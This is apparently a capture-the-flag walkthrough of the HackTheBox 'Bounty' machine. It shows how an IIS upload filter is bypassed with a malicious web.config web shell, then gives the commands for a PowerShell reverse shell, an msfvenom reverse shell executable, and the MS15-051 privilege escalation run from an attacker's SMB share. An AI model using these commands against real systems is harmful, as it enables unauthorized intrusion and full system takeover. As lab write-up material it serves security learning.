A medium Windows box from HackTheBox, get initial access by bypassing a upload filter and uploading a web shell, then escalate privileges by running a kernel exploit.


Running the usual nmap

sudo nmap -sC -sV -oA nmap/init
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: Bounty
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Just seems to be a server running IIS 7.5, navigating to the server, just see an image of merlin

Lets check for any hidden directories or files, I was stumped for a while before I added the extension check (for .asp and .aspx files)

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 40 -x asp,aspx --url

This turns up two interesting results

/transfer.aspx        (Status: 200) [Size: 941]                                        
/uploadedfiles        (Status: 301) [Size: 156] [-->]

Navigating to the transfer.aspx page, its a file upload page, which after testing with the same image of merlin as on the homepage, gets uploaded to the /uploadedfiles/ directory


The obvious choice here is a file upload vulnerability, so pull the list of possible ASP extensions from HackTricks and using just a test.txt text file with “test” inside of it

Going down the list, changing the extension in burp as we go, .config seems to work

Searching around, IIS has a default file named “web.config” which acts as a configuration file for the current directory

Googling for “malicious web.config” come up with this list of possible malicious web.config files, picking out the webshell version, copy it to a local file called “web.config” and upload it

Navigating to “/uploadedfiles/web.config”, are greeted with a webshell!

Now we can upgrade to a full reverse shell by executing a PowerShell one liner, copying it to a local file name “rev.ps1” and changing the IP and Port to the local Kali IP and port 4444

Then encode it with

cat rev.ps1 | iconv -t utf-16le | base64 -w 0


Start a listener on 4444, and execute it in the webshell with

powershell -enc PASTED_ENCODING_HERE

And catch a webshell

listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 49158

PS C:\windows\system32\inetsrv> whoami

Now checking the systeminfo

PS C:\windows\system32\inetsrv> systeminfo

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          9/19/2022, 6:27:34 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,581 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,588 MB
Virtual Memory: In Use:    507 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)

See that there are no hotfixes applied, and being Windows Server 2008, can use whatever privesc we want - I opted for MS15-051

I expose the exe to the victim, and as well as a reverse shell executable (made with msfvenom) via SMB

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=9001 -f exe > rev.exe 

Set up a reverse listener

rlwrap nc -lnvp 9001

And upload the executables using the smbserver script again

smbserver.py share .

Then on the victim execute them from the remote Kali SMB server

C:\WINDOWS\Temp> \\\share\ms15-051x64.exe \\\share\rev.exe

Check back on the listener

listening on [any] 9001 ...


nt authority\system

And have root!